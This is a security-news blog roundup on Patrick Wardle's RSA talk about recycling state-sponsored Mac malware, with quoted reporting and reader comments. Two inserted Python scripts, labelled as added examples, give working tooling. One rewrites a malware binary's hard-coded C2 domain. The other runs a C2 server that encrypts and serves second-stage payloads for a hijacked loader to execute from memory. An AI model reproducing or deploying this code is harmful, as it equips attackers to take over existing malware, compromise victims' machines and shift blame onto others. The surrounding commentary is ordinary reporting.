Recycling State-Sponsored Malware for Fun and Profit

What if criminals could take malware written by the NSA or Iran and repurpose it to attack their own targets? Not only would they get the benefit of sophisticated, well-tested code, but they could also misdirect researchers as to the malware’s true origins.

Ex-NSA hacker Patrick Wardle (pictured) gave one of the more interesting talks at last week’s RSA Conference, with worked examples of how such recycling can be done.

Fascinating. In today’s SB Blogwatch, we reuse and recycle (but never reduce).

Your humble blogwatcher curated these bloggy bits for your entertainment. Not to mention: My Corona(virus).


Misdirection Ahoy

What’s the craic? Dan Goodin reports—“Stealing advanced nations’ Mac malware isn’t hard”:

 At the RSA Security conference this week, a former hacker for the [NSA] demonstrated an approach that’s often more effective: stealing and then repurposing a rival’s code. [It] can be a smarter and less resource-intensive approach for deploying ransomware, remote access spy tools, and other types of malicious code [especially] repurposing of advanced code written by government-sponsored hackers.

The repurposing caused the malware to report to command servers belonging to Wardle rather than the servers designated by the developers. [It] allowed him to use well-developed and fully featured applications to install his own malicious payloads, obtain screenshots and other sensitive data from compromised Macs, and carry out other nefarious actions written into the malware.

Wardle used a hex editor to change the original version’s hard-coded control server domain to the address of the server under his control. [His] control server had to, among other things, encrypt [the payload] with the same key and cipher he observed during his analysis.

Malware repurposing is [not] unique to Mac. … This kind of recycling works against any operating system or platform. … “The idea is to let those with more time, money, and resources do all the hard work,” … Wardle said.
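The hex-editor step Goodin describes, as an added example written for this post (not Wardle’s tooling and not code from any real sample): a script that swaps a hard-coded C2 domain inside a binary image in place, without moving any other byte. The binary bytes and both domain names are constructed placeholders. The security-relevant detail a hex edit has to respect is that the domain usually sits inside a fixed, NUL-terminated C string (often a whole URL), so the replacement must be no longer than the original, and any padding has to go at the end of the string, not in the middle of the URL:

```python
"""Patch a hard-coded C2 domain in place, the way a hex edit would.

Added example for this write-up; it is not Wardle's code and the bytes below
are a constructed stand-in for a loader binary, not a real executable.
"""

# Constructed stand-in binary: fake header bytes, a NUL-terminated URL string
# that embeds the (placeholder) C2 domain, then some filler "code".
ORIGINAL_C2 = b"update.example-c2.com"           # placeholder domain
SAMPLE_BINARY = (
    b"\xcf\xfa\xed\xfe" + b"\x00" * 12            # fake Mach-O 64 magic + padding
    + b"https://" + ORIGINAL_C2 + b"/gate\x00"    # hard-coded beacon URL
    + b"\x90" * 16                                 # filler
)


def find_c2_offsets(binary, domain):
    """Every offset at which `domain` occurs (malware often keeps more than one copy)."""
    offsets, start = [], 0
    while (idx := binary.find(domain, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets


def extract_cstring(binary, offset):
    """The NUL-terminated C string that contains `offset`."""
    start = binary.rfind(b"\x00", 0, offset) + 1
    end = binary.index(b"\x00", offset)
    return binary[start:end]


def patch_c2_domain(binary, old, new):
    """Replace every copy of `old` with `new` without changing any offset.

    The domain lives inside a fixed-size C string, so `new` must fit in the
    space the original string occupies.  A shorter domain is handled by
    padding the *end* of the C string with NULs: padding right after the
    domain would terminate the string early and cut off the URL path.
    """
    offsets = find_c2_offsets(binary, old)
    if not offsets:
        raise ValueError("original domain not found; obfuscated or built at runtime?")
    patched = bytearray(binary)
    for off in offsets:
        start = binary.rfind(b"\x00", 0, off) + 1
        end = binary.index(b"\x00", off)
        cstr = binary[start:end]
        new_cstr = cstr.replace(old, new)
        if len(new_cstr) > len(cstr):
            raise ValueError(
                f"'{new.decode()}' needs {len(new_cstr)} bytes but the slot holds "
                f"{len(cstr)}; a longer name needs relocation, not a hex edit"
            )
        patched[start:end] = new_cstr + b"\x00" * (len(cstr) - len(new_cstr))
    assert len(patched) == len(binary)  # nothing moved
    return bytes(patched)


if __name__ == "__main__":
    out = patch_c2_domain(SAMPLE_BINARY, ORIGINAL_C2, b"c2.redteam.lab")
    print(extract_cstring(out, out.index(b"https://")))
```

Two caveats the script makes visible: a hex edit only works when the domain is a plain string in the image (an obfuscated or runtime-built string needs a code patch instead), and on macOS changing any byte of a signed binary invalidates its code signature, so the patched loader has to be re-signed (or stripped of its signature) before it will run on a system that enforces signing.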

And Ben Lovejoy adds—“Ex-NSA hacker made … state-created Mac malware run his own code”:

 The way this type of malware works is to upload captured data to servers owned by the government which created them, and to download additional malware from these servers. Wardle was able to crack the encryption used and to point the malware to his own server instead.

This is, he says, already happening. For example, there is evidence that malware developed by the NSA has been used by China, North Korea, and the Russian Federation. Something to bear in mind when the US government is asking Apple to create a compromised version of iOS for use by US law enforcement.

But why? Malcolm Owen explains—“an effective approach for malware creators”:

 There could be two key benefits for hackers by taking the approach, with the main one being how other state-sponsored groups could save having to develop or risk exposing their own malware to accomplish a task. This would allow them to keep their own techniques and software secret for use in the future, minimizing detection down the line.

The second byproduct is that, if the malware is detected and analyzed, blame for the attack could be attributed to the malware’s original developers and not the active users.

[Also] the code developed by the teams is usually better and not as resource-intensive as other home-cooked efforts, and is probably more robust.

From the horse’s mouth? Patrick Wardle—“repurposing a 1st-stage loader, to execute custom ‘fileless’ payloads”:

 In a nutshell, the idea is take existing malware and reconfigure (“repurpose” or “recycle”) it for your own surreptitious purposes (i.e. testing, red-teaming, offensive cyber-operations, etc).

The many benefits of repurposing others’ malware … basically boil down to the fact that various well-funded groups and agencies are creating fully-featured malware, so why not leverage their hard work, in a way (that if discovered) will likely be (mis)attributed back to them? … IMHO, it’s a lovely idea.

The Lazarus group’s malware … is a perfect candidate for repurposing. … As a 1st-stage loader, it simply beacons out to a remote server for 2nd-stage payloads (which … are executed directly from memory).

It should be rather trivial to repurpose the loader to communicate instead with our server, and thus stealthily execute our own 2nd-stage payloads … without us having to write a single-line of (client-side) code.

After identifying a malware specimen to … “recycle,” the next step is to comprehensively understand how it works. [Then] we should be able to remotely transmit an encrypted & encoded binary payload and have the malware execute it directly from memory.
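The server side of what Wardle and Goodin describe (a controlled server answering the loader’s beacon with a payload encrypted and encoded the way the original operators’ server did), as an added example written for this post. It is not Wardle’s server and does not reproduce the Lazarus loader’s real scheme: the key, the HMAC-SHA256 counter-mode stream cipher, the nonce-plus-ciphertext framing, base64 encoding, the GET beacon and the Mach-O magic check are all assumed placeholders standing in for whatever analysis of the specimen actually reveals. The useful pattern is the pairing: `loader_unwrap` is the analyst’s re-implementation of the loader’s receive path, used as an oracle to confirm that `wrap_stage2` produces something the real loader will decrypt and run.

```python
"""Mock C2 for a repurposed first-stage loader (added example, not Wardle's code).

ASSUMED placeholders, to be replaced with what reverse engineering shows:
  - key / cipher: HMAC-SHA256 counter-mode keystream XORed over the payload
  - framing:      base64( nonce[16] || ciphertext )
  - sanity check: the loader verifies a Mach-O 64 magic before executing
"""
import base64
import hashlib
import hmac
import os
from http.server import BaseHTTPRequestHandler, HTTPServer

C2_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # placeholder key
NONCE_LEN = 16
MH_MAGIC_64 = b"\xcf\xfa\xed\xfe"  # little-endian Mach-O 64 magic

# Constructed stand-in for a second-stage image: magic plus filler bytes.
SAMPLE_STAGE2 = MH_MAGIC_64 + b"\x00" * 28 + b"stage2-payload-bytes"


def _keystream(key, nonce, length):
    """Placeholder counter-mode keystream: HMAC-SHA256(key, nonce || counter)."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def wrap_stage2(payload, key=C2_KEY, nonce=None):
    """Server side: encrypt, then encode, exactly as the loader expects."""
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    ks = _keystream(key, nonce, len(payload))
    ct = bytes(p ^ k for p, k in zip(payload, ks))
    return base64.b64encode(nonce + ct)


def loader_unwrap(response, key=C2_KEY):
    """Analyst's re-implementation of the loader's receive path (the oracle).

    If this returns the payload, the real loader, which runs the same steps,
    will execute it from memory; if the magic check fails, the server's key
    or framing does not match what the loader was built with.
    """
    raw = base64.b64decode(response, validate=True)
    nonce, ct = raw[:NONCE_LEN], raw[NONCE_LEN:]
    pt = bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))
    if not pt.startswith(MH_MAGIC_64):
        raise ValueError("decrypted blob is not a Mach-O: wrong key or framing")
    return pt


class BeaconHandler(BaseHTTPRequestHandler):
    """Answer the loader's beacon (assumed to be a plain GET) with the wrapped payload."""

    def do_GET(self):
        body = wrap_stage2(SAMPLE_STAGE2)
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Verify against the oracle before pointing the patched loader at us.
    assert loader_unwrap(wrap_stage2(SAMPLE_STAGE2)) == SAMPLE_STAGE2
    HTTPServer(("127.0.0.1", 8080), BeaconHandler).serve_forever()
```

The order of operations in `wrap_stage2` (encrypt first, then encode) has to match the loader’s decode path byte for byte; a server that gets the framing subtly wrong fails silently, because the loader simply never executes anything, which is why the oracle check runs before the server is exposed.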

All is lost! geekmux mucks it up: [You’re fired—Ed.]

 We humans managed to take this host planet and carve it up into countries. What’s yours is yours, and what’s mine is mine.

Or at least until I decide what’s yours is mine too. And then we go to war. Later, rinse, and repeat for oh I dunno, the last few thousand years.

At some point, we humans gave birth to this virtual world. But it’s still a world built and represented by humans. … What the **** did you expect would happen? Even Nostradamus’ dog could have seen that stupid **** coming a century away.

So Lkrupp sounds slightly sarcastic:

 This just reinforces the idea that government backdoors into encrypted data would be perfectly safe in the hands of bureaucrats. Nothing to worry about here.

As does Michael Knopp:

 What a load of fake news. Everybody (in Washington DC) knows that weaknesses made for them good guys … can only be used by the good guys. It is impossible for the bad guys … to ever use something that the good guys use to protect the children (or whatever other emotionally charged thing you are interested in) for nefarious purposes.

And what have we learned? Here’s kot-begemot-uk, with a perspective:

 Any “researcher” trying to attribute something to CIA, KGB, GRU, Mossad, etc., on the grounds of “they are using the same malware” should be tarred, dipped in feathers and manure and made to start and sign any of his articles with a suitable picture of him covered in feathers and bull**** similar to the one they spread.

Alternatively they should start with a disclaimer of who is paying them for the propaganda hatchet job.

Or, to put it another way, Jedakiah corollorizes thuswise:

 This gives nation states the plausible deniability they need to get away with a lot more intrusive actions.

Meanwhile, ArhcAngel goes all Jobsian on us:

 Who was it that said, “Good artists copy, great artists steal”?

And Finally:

An MD sings: Covid-19 and racism



You have been reading SB Blogwatch by Richi Jennings. Richi curates the best bloggy bits, finest forums, and weirdest websites… so you don’t have to. Hate mail may be directed to @RiCHi or [email protected]. Ask your doctor before reading. Your mileage may vary. E&OE.

Image source: The CyberWire (cc:by-nd)

Richi Jennings


Richi Jennings is a foolish independent industry analyst, editor, and content strategist. A former developer and marketer, he’s also written or edited for Computerworld, Microsoft, Cisco, Micro Focus, HashiCorp, Ferris Research, Osterman Research, Orthogonal Thinking, Native Trust, Elgan Media, Petri, Cyren, Agari, Webroot, HP, HPE, NetApp on Forbes and CIO.com. Bizarrely, his ridiculous work has even won awards from the American Society of Business Publication Editors, ABM/Jesse H. Neal, and B2B Magazine.
